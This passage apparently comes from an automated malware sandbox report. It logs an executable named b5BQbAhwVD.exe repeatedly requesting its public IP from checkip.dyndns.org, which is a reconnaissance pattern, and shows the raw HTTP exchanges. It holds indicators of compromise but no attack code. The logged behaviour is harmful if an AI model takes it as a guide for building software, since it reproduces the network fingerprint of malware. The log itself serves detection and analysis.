                                                                                                                Jan 10, 2025 22:44:09.059585094 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:08 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 73361d6544a4316da93ab6d895505dd1
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                20192.168.2.650028158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:10.081916094 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:10.669655085 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:10 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 18f5d910c1ebf6587f453a0d32f579f5
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                21192.168.2.650030158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:11.625937939 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:12.193787098 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:12 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: c8a621cbd82c86023830af836c4a9a3e
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                22192.168.2.650032158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:13.232475042 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:13.892982006 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:13 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 912455aac2eeadab13bc80ebc2cdbb55
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                23192.168.2.650034158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:14.917020082 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:15.508838892 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:15 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 336e744da401548035acc1d9ab6f2eea
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                24192.168.2.650036158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:16.471555948 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:17.063958883 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:16 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: a3c45979f2b330af87ee91a31c99b9ad
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                25192.168.2.650038158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:18.084096909 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:18.677125931 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:18 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: f70e2cf148bac93113f1d7d8e650da48
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                26192.168.2.650040158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:19.755383015 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:20.343786955 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:20 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 39235d4fcd497482a22282ddbd98d15a
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                27192.168.2.650042158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:21.423227072 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:21.987494946 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:21 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 7a3a58f6101d86384bc9ccbcab2eb64c
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                28192.168.2.650044158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:23.047899961 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:23.654551983 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:23 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: ec8cf56d35d969c045ceacb590200575
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                29192.168.2.650046158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:24.643943071 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:25.226088047 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:25 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: fb55f8ed76a4dd9c267bcb32f1c2c1b0
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                30192.168.2.650048158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:26.115766048 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:26.678391933 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:26 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 944915aa047ecaca2f3c1839042da5b6
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                31192.168.2.650050158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:27.708105087 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:28.271403074 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:28 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 335fc5483e39bfbd6ad51a5157cfa003
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                32192.168.2.650052158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:29.450934887 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:30.034209967 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:29 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: ee48d490b0e1798ec42161bbc31dff2e
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                33192.168.2.650054158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:30.998200893 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:31.590956926 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:31 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 910eb7c7f2de250ac6ccab9a48d1a41c
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                34192.168.2.650056158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:32.513875008 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:33.096688032 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:33 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 18cf14a3ff465978977e9e99ead4e855
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                35192.168.2.650058158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:33.974265099 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:34.541562080 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:34 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 9b19bda87c265f450f5f45447f4ebf6a
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                36192.168.2.650060158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:35.520284891 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:36.085144997 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:36 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 27757e40822fce235f66e86201a8fffb
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                37192.168.2.650062158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:37.017911911 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:37.644534111 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:37 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 5697e2ed9fe6f763b1b3a3b8928b06c7
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                38192.168.2.650064158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:38.678992987 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:39.255393028 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:39 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: d939ec0bfdd1ddbc9219bde3b7a83713
